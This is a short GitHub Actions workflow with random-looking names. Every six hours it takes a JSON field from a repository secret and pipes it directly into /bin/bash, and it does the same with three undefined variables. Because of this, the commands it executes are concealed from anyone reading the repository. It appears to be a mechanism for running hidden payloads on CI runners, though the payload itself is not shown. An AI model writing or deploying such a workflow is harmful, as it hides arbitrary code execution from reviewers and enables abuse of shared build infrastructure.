name: zhongliruo6121
on:
  workflow_dispatch:
  schedule:
    - cron: '26 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhongliruo6121
        env:
          ha43: ${{ secrets.ha43 }}
        run: |
          echo $ha43 | jq -r .uuo651 | /bin/bash
          echo $zco6945 | jq -r .edqjd9 | /bin/bash
          echo $fit921 | jq -r .ubc1 | /bin/bash
          echo $mmrdk7031 | jq -r .kftmq02 | /bin/bash

